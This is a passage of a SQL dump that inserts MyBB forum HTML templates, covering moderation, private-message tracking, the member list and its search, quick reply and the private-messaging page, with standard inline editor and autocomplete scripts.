'-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('167', 'moderation_inline_deleteposts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_posts}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_posts}</td>\n</tr>\n{$loginbox}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_posts}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_multideleteposts\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"posts\" value=\"{$inlineids}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('168', 'online_today', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->online_today}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->on_username}</strong></span></td>\n<td class=\"thead\" align=\"center\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->time}</strong></span></td>\n</tr>\n{$todayrows}\n<tr>\n<td align=\"center\" colspan=\"2\" class=\"trow1\" style=\"white-space: nowrap\">{$onlinetoday}</td>\n</tr>\n</table>\n<br />\n{$multipage}\n{$footer}\n</body>\n</html>', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('169', 'forumdisplay_thread_modbit', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$multitid}\" id=\"inlinemod_{$multitid}\" value=\"1\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('170', 'forumdisplay_thread_gotounread', '<a href=\"{$thread[\'newpostlink\']}\"><img src=\"{$theme[\'imgdir\']}/jump.gif\" alt=\"{$lang->goto_first_unread}\" title=\"{$lang->goto_first_unread}\" /></a> ', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('171', 'private_tracking', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->pm_tracking}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$read_multipage}\n<form action=\"private.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_tracking\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->read_messages}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->sentto}</strong></span></td>\n<td class=\"tcat\" align=\"right\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->dateread}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1%\"><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox checkall\" /></span></td>\n</tr>\n{$readmessages}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"5\"><strong><input type=\"submit\" class=\"button\" name=\"stoptracking\" value=\"{$lang->stop_tracking}\" /> {$lang->selected_messages}</strong></td>\n</tr>\n</table>\n</form>\n<br />\n{$unread_multipage}\n<form action=\"private.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_tracking\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->unread_messages}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td>\n<td class=\"tcat\" align=\"center\" style=\"white-space: nowrap\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->sentto}</strong></span></td>\n<td class=\"tcat\" align=\"right\" style=\"white-space: nowrap\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->datesent}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox checkall\" /></span></td>\n</tr>\n{$unreadmessages}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"5\"><strong><input type=\"submit\" class=\"button\" name=\"stoptrackingunread\" value=\"{$lang->stop_tracking}\" /> / <input type=\"submit\" class=\"button\" name=\"cancel\" value=\"{$lang->cancel}\" /> {$lang->selected_messages}</strong></td>\n</tr>\n</table>\n</form>\n</td></tr></table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('172', 'moderation_threadnotes', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->thread_notes_editor}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->thread_notes_editor}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\" colspan=\"2\">{$lang->below_notes}</td>\n</tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><textarea name=\"threadnotes\" cols=\"80\" rows=\"10\" tabindex=\"1\">{$thread[\'notes\']}</textarea></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_notes}\" tabindex=\"2\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_threadnotes\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->mod_logs}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_date}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td>\n</tr>\n{$modactions}\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->delayed_mod_queue}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->days_to_perform_action}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td>\n</tr>\n{$delayedmods}\n</table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('173', 'error_maxpostimages', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->error_too_many_images}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$lang->error_too_many_images2}<br /><span class=\"smalltext\">{$lang->error_too_many_images3} {$mybb->settings[\'maxpostimages\']}.</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('174', 'private_archive_html', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->private_messages_for}</title>\n<style type=\"text/css\">{$css}\n* {text-align: left}</style>\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"1\"><span class=\"largetext\"><strong>{$lang->private_messages_for}</strong></span></td>\n</tr>\n{$pmsdownload}\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" colspan=\"1\">{$lang->exported_date}<br /><a href=\"{$mybb->settings[\'bburl\']}\">{$mybb->settings[\'bbname\']}</a></td>\n</tr>\n</table>\n</body>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('175', 'private_messagebit', '<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/{$msgfolder}\" alt=\"{$msgalt}\" title=\"{$msgalt}\" /></td>\n<td align=\"center\" class=\"trow2\" width=\"1%\">{$icon}</td>\n<td class=\"trow1\" width=\"35%\">{$msgprefix}<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\">{$message[\'subject\']}</a>{$msgsuffix}{$denyreceipt}</td>\n<td align=\"center\" class=\"trow2\">{$tofromusername}</td>\n<td class=\"trow1\" align=\"right\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$senddate} {$sendtime}</span></td>\n<td class=\"trow2\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$message[\'pmid\']}]\" value=\"1\" /></td>\n</tr>', '-2', '128', '', '1339729416'); INSERT INTO mybb_templates VALUES('176', 'private_search_messagebit', '<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/{$msgfolder}\" alt=\"{$msgalt}\" title=\"{$msgalt}\" /></td>\n<td align=\"center\" class=\"trow2\" width=\"1%\">{$icon}</td>\n<td class=\"trow1\" width=\"35%\">{$msgprefix}<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\">{$message[\'subject\']}</a>{$msgsuffix}{$denyreceipt}\n<br />{$message[\'message\']}</td>\n<td align=\"center\" class=\"trow2\">{$tofromusername}</td>\n<td align=\"center\" class=\"trow1\"><a href=\"private.php?fid={$message[\'folder\']}\">{$foldername}</a></td>\n<td class=\"trow2\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$senddate} {$sendtime}</span></td>\n<td class=\"trow1\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$message[\'pmid\']}]\" value=\"1\" /></td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('177', 'private_multiple_recipients', '<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\" id=\"private_message_{$message[\'pmid\']}\">{$lang->multiple_recipients}</a>\n <div id=\"private_message_{$message[\'pmid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"tcat\"><strong>{$lang->to}</strong></div>{$to_users}{$bcc_users}</div>\n<script type=\"text/javascript\">\n<!--\n new PopupMenu(\"private_message_{$message[\'pmid\']}\");\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('178', 'private_multiple_recipients_user', '<div class=\"popup_item_container\"><a href=\"{$profilelink}\" class=\"popup_item\">{$username}</a></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('179', 'private_multiple_recipients_bcc', '<div class=\"tcat\"><strong>{$lang->bcc}</strong></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('180', 'private_nomessages', '<tr>\n<td colspan=\"6\" class=\"trow1\">{$lang->nomessages}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('181', 'private_search_results_nomessages', '<tr>\n<td colspan=\"7\" class=\"trow1\">{$lang->nomessages}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('182', 'codebuttons', '<script type=\"text/javascript\" src=\"jscripts/editor.js?ver=1600\"></script>\n<script type=\"text/javascript\">\n<!--\n {$editor_language}\n var clickableEditor = new messageEditor(\"{$bind}\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"});\n if(clickableEditor)\n {\n clickableEditor.bindSmilieInserter(\"clickable_smilies\");\n }\n// -->\n</script>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('183', 'showthread_quickreply', '<br />\n<form method=\"post\" action=\"newreply.php?tid={$tid}&amp;processed=1\" name=\"quick_reply_form\" id=\"quick_reply_form\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"subject\" value=\"RE: {$thread[\'subject\']}\" />\n <input type=\"hidden\" name=\"action\" value=\"do_newreply\" />\n <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" id=\"posthash\" />\n <input type=\"hidden\" name=\"quoted_ids\" value=\"\" id=\"quoted_ids\" />\n <input type=\"hidden\" name=\"lastpid\" id=\"lastpid\" value=\"{$last_pid}\" />\n <input type=\"hidden\" name=\"from_page\" value=\"{$page}\" />\n <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n <input type=\"hidden\" name=\"method\" value=\"quickreply\" />\n\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"2\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'quickreply\']}.gif\" id=\"quickreply_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><strong>{$lang->quick_reply}</strong></div>\n </td>\n </tr>\n </thead>\n <tbody style=\"{$collapsed[\'quickreply_e\']}\" id=\"quickreply_e\">\n <tr>\n <td class=\"trow1\" valign=\"top\" width=\"22%\">\n <strong>{$lang->message}</strong><br />\n <span class=\"smalltext\">{$lang->message_note}<br /><br />\n <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" {$postoptionschecked[\'signature\']} />&nbsp;<strong>{$lang->signature}</strong></label><br />\n <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" />&nbsp;<strong>{$lang->disable_smilies}</strong></label>{$closeoption}</span>\n </td>\n <td class=\"trow1\">\n <div style=\"width: 95%\">\n <textarea style=\"width: 100%; padding: 4px; margin: 0;\" rows=\"8\" cols=\"80\" name=\"message\" id=\"message\" tabindex=\"1\"></textarea>\n </div>\n <div class=\"editor_control_bar\" style=\"width: 95%; padding: 4px; margin-top: 3px; display: none;\" id=\"quickreply_multiquote\">\n <span class=\"smalltext\">\n {$lang->quickreply_multiquote_selected} <a href=\"./newreply.php?tid={$tid}&amp;load_all_quotes=1\" onclick=\"return Thread.loadMultiQuoted();\">{$lang->quickreply_multiquote_now}</a> {$lang->or} <a href=\"javascript:Thread.clearMultiQuoted();\">{$lang->quickreply_multiquote_deselect}</a>.\n </span>\n </div>\n </td>\n </tr>\n {$captcha}\n <tr>\n <td colspan=\"2\" align=\"center\" class=\"tfoot\"><input type=\"submit\" class=\"button\" value=\"{$lang->post_reply}\" tabindex=\"2\" accesskey=\"s\" id=\"quick_reply_submit\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"3\" /></td>\n </tr>\n </tbody>\n </table>\n</form>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('184', 'memberlist', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->member_list}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$multipage}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\">\n <div class=\"float_right\">\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->a}\" style=\"padding: 5px;\">{$lang->a}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->b}\" style=\"padding: 5px;\">{$lang->b}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->c}\" style=\"padding: 5px;\">{$lang->c}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->d}\" style=\"padding: 5px;\">{$lang->d}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->e}\" style=\"padding: 5px;\">{$lang->e}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->f}\" style=\"padding: 5px;\">{$lang->f}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->g}\" style=\"padding: 5px;\">{$lang->g}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->h}\" style=\"padding: 5px;\">{$lang->h}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->i}\" style=\"padding: 5px;\">{$lang->i}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->j}\" style=\"padding: 5px;\">{$lang->j}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->k}\" style=\"padding: 5px;\">{$lang->k}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->l}\" style=\"padding: 5px;\">{$lang->l}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->m}\" style=\"padding: 5px;\">{$lang->m}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->n}\" style=\"padding: 5px;\">{$lang->n}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->o}\" style=\"padding: 5px;\">{$lang->o}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->p}\" style=\"padding: 5px;\">{$lang->p}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->q}\" style=\"padding: 5px;\">{$lang->q}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->r}\" style=\"padding: 5px;\">{$lang->r}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->s}\" style=\"padding: 5px;\">{$lang->s}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->t}\" style=\"padding: 5px;\">{$lang->t}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->u}\" style=\"padding: 5px;\">{$lang->u}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->v}\" style=\"padding: 5px;\">{$lang->v}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->w}\" style=\"padding: 5px;\">{$lang->w}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->x}\" style=\"padding: 5px;\">{$lang->x}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->y}\" style=\"padding: 5px;\">{$lang->y}</a>\n <a href=\"memberlist.php?username_match=begins&amp;username={$lang->z}\" style=\"padding: 5px;\">{$lang->z}</a>\n </div>\n <div><strong>{$lang->member_list}</strong></div></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"1%\"><span class=\"smalltext\"><strong>{$lang->avatar}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->joined}</strong></span></td>\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td>\n<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td>\n{$referral_header}\n</tr>\n{$users}\n</table>\n<div class=\"float_right\" style=\"padding-top: 4px;\">\n <a href=\"showteam.php\"><strong>{$lang->forumteam}</strong></a>\n</div>\n{$multipage}\n<br style=\"clear: both;\" />\n<br />\n<form method=\"post\" action=\"memberlist.php\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\">\n <div class=\"float_right\">\n <strong><a href=\"memberlist.php?action=search\">{$lang->advanced_search}</a></strong>\n </div>\n <div><strong>{$lang->search_members}</strong></div>\n</td>\n</tr>\n<tr>\n <td class=\"tcat\"><strong><label for=\"username\">{$lang->username}</label></strong></td>\n <td class=\"tcat\"><strong><label for=\"website\">{$lang->website}</label></strong></td>\n <td class=\"tcat\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\">\n {$lang->contains}<br />\n <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 99%; margin-top: 4px;\" value=\"{$search_username}\" />\n </td>\n <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\">\n {$lang->contains}<br />\n <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" style=\"width: 99%; margin-top: 4px;\" value=\"{$search_website}\" />\n </td>\n <td class=\"trow1\" width=\"33%\">\n <select name=\"sort\" id=\"sort\" style=\"width: 99%;\">\n <option value=\"username\"{$sort_selected[\'username\']}>{$lang->sort_by_username}</option>\n <option value=\"regdate\"{$sort_selected[\'regdate\']}>{$lang->sort_by_regdate}</option>\n <option value=\"lastvisit\"{$sort_selected[\'lastvisit\']}>{$lang->sort_by_lastvisit}</option>\n <option value=\"postnum\"{$sort_selected[\'postnum\']}>{$lang->sort_by_posts}</option>\n <option value=\"referrals\"{$sort_selected[\'referrals\']}>{$lang->sort_by_referrals}</option>\n </select><br />\n <span class=\"smalltext\">\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"ascending\"{$order_check[\'ascending\']} /> <label for=\"order_asc\">{$lang->order_asc}</label><br />\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"descending\"{$order_check[\'descending\']} /> <label for=\"order_desc\">{$lang->order_desc}</label>\n </span>\n </td>\n</tr>\n</table>\n<div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div>\n</form>\n{$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1602', '', '1339729416'); INSERT INTO mybb_templates VALUES('185', 'memberlist_referrals', '<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->referrals}</strong></span></td>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('186', 'memberlist_referrals_bit', '<td class=\"{$alt_bg}\" align=\"center\">{$user[\'referrals\']}</td>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('187', 'memberlist_search', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->search_member_list}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form method=\"post\" action=\"memberlist.php\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->search_member_list}</strong></td>\n</tr>\n<tr>\n <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_criteria}</strong></td>\n</tr>\n<tr>\n <td class=\"trow1\" style=\"vertical-align: top;\" width=\"20%\"><strong><label for=\"username\">{$lang->username}</label></strong></td>\n <td class=\"trow1\">\n <select name=\"username_match\">\n <option value=\"begins\">{$lang->begins_with}</option>\n <option value=\"contains\">{$lang->username_contains}</option>\n </select>\n &nbsp;\n <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" />\n </td>\n</tr>\n<tr>\n <td class=\"trow2\" width=\"20%\"><strong><label for=\"website\">{$lang->search_website}</label></strong></td>\n <td class=\"trow2\">\n <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" />\n </td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"aim\">{$lang->search_aim}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" name=\"aim\" id=\"aim\" />\n </td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"msn\">{$lang->search_msn}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" name=\"msn\" id=\"msn\" />\n </td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"yahoo\">{$lang->search_yahoo}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" name=\"yahoo\" id=\"yahoo\" />\n </td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"icq\">{$lang->search_icq}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" name=\"icq\" id=\"icq\" />\n </td>\n</tr>\n<tr>\n <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_options}</strong></td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td>\n <td class=\"trow1\">\n <select name=\"sort\" id=\"sort\">\n <option value=\"username\">{$lang->sort_by_username}</option>\n <option value=\"regdate\">{$lang->sort_by_regdate}</option>\n <option value=\"lastvisit\">{$lang->sort_by_lastvisit}</option>\n <option value=\"postnum\">{$lang->sort_by_posts}</option>\n </select><br />\n <span class=\"smalltext\">\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"asc\" /> <label for=\"order_asc\">{$lang->order_asc}</label><br />\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"desc\" /> <label for=\"order_desc\">{$lang->order_desc}</label>\n </span>\n </td>\n</tr>\n<tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"perpage\">{$lang->per_page}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" size=\"4\" name=\"perpage\" id=\"perpage\" value=\"15\" />\n </td>\n</tr>\n</table>\n<div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div>\n</form>\n{$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('188', 'private', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"pmForm\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\n<tr>\n<td class=\"trow1\">{$pmspacebar}<span class=\"smalltext\"><a href=\"private.php\">{$lang->inbox}</a> | <a href=\"private.php?action=send\">{$lang->compose_message2}</a> | <a href=\"private.php?action=folders\">{$lang->manage_folders}</a> | <a href=\"private.php?action=empty\">{$lang->empty_folders2}</a> | <a href=\"private.php?action=export\">{$lang->export_messages2}</a></span></td>\n</tr>\n</table>\n</td>\n</tr>\n</table>\n<br />\n{$limitwarning}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\">\n <div class=\"float_right\">\n <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" />\n <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" />\n (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div>\n <strong>{$lang->pms_in_folder}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" colspan=\"3\"><span 